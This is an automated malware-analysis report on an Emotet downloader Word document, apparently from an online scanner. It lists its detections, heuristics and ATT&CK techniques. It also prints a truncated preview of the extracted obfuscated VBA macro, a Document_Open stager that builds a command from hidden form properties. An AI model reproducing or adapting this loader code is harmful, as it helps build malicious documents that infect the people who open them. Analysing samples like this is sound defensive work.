MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-7464351-0. Critical heuristics indicate the presence of a VBA UserForm hidden-property command stager, which is designed to auto-execute and likely download a second-stage payload. The Document_Open macro is present, further supporting the execution of malicious code upon opening the document.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-7464351-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7464351-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10680 bytes |
SHA-256: 735c7348189bec3d0f5209f59be363cada8ae1ff8fd2e6a4a9c83a586a7dd0fa |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Ohzfpovte"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Okwrtmcmokcs, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Vgvlvktybvj
Case Kyysnhlim
Rzciwhkfx = Sin(Wtqtbsugkd)
Zcdfgxdfjspuw = CStr(Cukeicybec)
Sngcbgacg = 324
Ehuyceev = Sin(Hslazcwaaycm)
Rdpoovfeir = CStr(Ndvxagwnkvucc)
Cguzrrkh = 567
Qhbodjttcpt = Sin(Yvqdawjm)
Sdyospfdww = CStr(Zvyglajank)
Vebnjkqb = 5645
End Select
For Jkfubdwmxitow = Tlidlxifu To Ostlfifdmnb
While Fdbmokhhgipyh <> Yafkbnpesldk
Iqsukxiwvrkl = Jemxkmeli * Atn(Kpyiblzyoxr) * (Xalcfozqh + Oyfawpxibfzh)
Wend
Next
Select Case Wmrasvwsic
Case Lvwgaxvcvafmh
Gfxcdgblx = Sin(Zepcdabr)
Qfblmjnvh = CStr(Fpqmkaqpkjyp)
Qmtxfkpnapawq = 324
Oqqljtpyptalb = Sin(Sqdnvwuycudso)
Ojzsvshdne = CStr(Deeznxexjsd)
Usoqgbax = 567
Qmiudknqi = Sin(Quxvpvkddv)
Sbasmgda = CStr(Znnfdamw)
Brdyqvrfquzj = 5645
End Select
For Qtdrbjftsq = Ikrjrhsmbb To Brpxkwbp
While Pkxuutpi <> Dgmhohcrryh
Apjuhjwofhevh = Myxtcjzvehjct * Atn(Ewaowelzhzczx) * (Mgwgfsaol + Ufmxgdfg)
Wend
Next
Select Case Lwvpsjsqzamt
Case Igfsjmpam
Brbnflat = Sin(Zqrjrxuzwqxjq)
Nvumfkkhl = CStr(Rdtpmzqlipoj)
Vbqxfsbjfsq = 324
Rlpjfsagq = Sin(Exsejrzlc)
Itjfypixaz = CStr(Zatgiqrhewjt)
Xantedjhcvzzu = 567
Sehyeteplqulq = Sin(Kqxysikhuc)
Xygjwgjmrbvd = CStr(Kbcjrtbqlicv)
Iwnwvcgqfhy = 5645
End Select
For Tvivtszxi = Kqpgnygaot To Ozhdmuwvlmmi
While Nidtsarc <> Mzdgaxqnq
Wlpmdlkzxdhl = Yxuacdlncr * Atn(Punvyruiqwn) * (Pgdobfoswca + Nxijjxzmvp)
Wend
Next
Hlapdnjk
End Sub
Attribute VB_Name = "Svwebryswbx"
Attribute VB_Base = "0{E63A8E29-ECBB-4891-834E-6C8A7EB38957}{AC36B4C4-DB8F-4E14-AAD0-E9DD8E767F8E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Syiycnhxkbedn"
Function Pvpmmwkzwdlme()
Select Case Wsmdwaydefns
Case Keeepqlxzrhu
Epaikfajghwan = Sin(Dvbmvbzswra)
Tuwbqazpefint = CStr(Xiocaivvgiove)
Rjybplku = 324
Mzyqsybzbvn = Sin(Grxzqtbfusaoy)
Mmmoepoixenj = CStr(Ccqokrjsltaii)
Yctjinpiz = 567
Siaudjojrq = Sin(Oxjubsnvhwbyc)
Eintrrbz = CStr(Qqqtyarocfmz)
Plbbwhbskjj = 5645
End Select
For Wsimyick = Ciwjkznnfozdf To Ctqyggky
While Wutnqqdnoztz <> Swweldtmtmvp
Wqskapofua = Wqrphcvyfjkgm * Atn(Jbhsberr) * (Izidncvpn + Udesungm)
Wend
Next
Dwyjwtrbgp = Ohzfpovte.Okwrtmcmokcs
Select Case Apeitobvjaxx
Case Akvcidef
Ikyjtfnwfmq = Sin(Nxbeozgfwtbl)
Rnenvunaips = CStr(Mbrnlvpi)
Zpgollqxy = 324
Wiayukhmoml = Sin(Teefpqnglhey)
Cprsulnqt = CStr(Qkhvqundlvh)
Hidjkavafe = 567
Wtrahclnqzffl = Sin(Rudkvjglli)
Svpkfcytb = CStr(Esvsuhcx)
Nefcuknqhfs = 5645
End Select
For Ssapzdmblusys = Lejkfreqkhl To Dtqkbwdzus
While Mmcjmdckxedw <> Eocphnlbyseix
Qrlfqsecgxdjg = Ptcdroxekpilo * Atn(Egfogmrqr) * (Mwsdeenz + Ftehtnbqhh)
Wend
Next
Jltfxipurrvv = Dwyjwtrbgp + Svwebryswbx.Artcdlagwia + Svwebryswbx.Ojskbjakj + Svwebryswbx.Gpihqmcxuyw
Select Case Aldrmcty
Case Hmjgoeuxblzy
Siuonsultylu = Sin(Phaokhspwdpi)
Pfccgjzeif = CStr(Avtkutob)
Kloxbclryemh = 324
Wjohtkzvcgh = Sin(Miwueevuqoihw)
Ghrszfolfhi = CStr(Pihqefyicjid)
Fugzxriovooy = 567
Xqnwhafigrcqu = Sin(Xjpxmiqyh)
Mamtcgoal = CStr(Lvanxopxgwaky)
Afpgsflbofvno = 5645
End Select
For Twtbxuxz = Jkejlqon To Jketqaumh
While Aaederxi <> Geeivhsd
Ajqsirzkw = Rjbjjzghzr * Atn(Cdgalusc) * (Uaqjmumrmles + Czmimwqqvjoo)
Wend
Next
Rplojgrhtx
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.